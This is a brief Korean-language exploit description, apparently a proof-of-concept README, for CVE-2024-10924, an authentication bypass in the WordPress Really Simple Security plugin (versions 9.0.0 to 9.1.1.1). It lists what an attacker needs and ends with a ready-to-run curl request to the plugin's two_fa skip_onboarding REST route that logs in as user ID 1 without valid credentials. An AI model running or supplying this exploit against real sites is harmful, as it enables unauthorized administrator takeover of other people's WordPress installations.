
CVE-2024-10924에 대한 익스플로잇, WordPress Really Simple Security 플러그인 (버전 9.0.0-9.1.1.1)의 치명적인 인증 우회. Two-Factor Authentication API의 결함을 통해 인증되지 않은 공격자가 모든 사용자로 로그인할 수 있습니다.
CVE-2024-10924는 WordPress용 Really Simple Security 플러그인(버전 9.0.0 ~ 9.1.1.1)의 치명적인 인증 우회 취약점입니다. 이 취약점을 통해 인증되지 않은 공격자는 Two-Factor Authentication(2FA) API의 결함을 악용하여 모든 사용자(관리자 포함)로 로그인할 수 있습니다.
취약한 버전의 Really Simple Security 플러그인이 실행 중인 WordPress 사이트. 테스트를 위해 Python 3.x 또는 cURL 설치. 대상 WordPress 관리자 사용자 이름 (사용자 열거가 필요할 수 있음).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v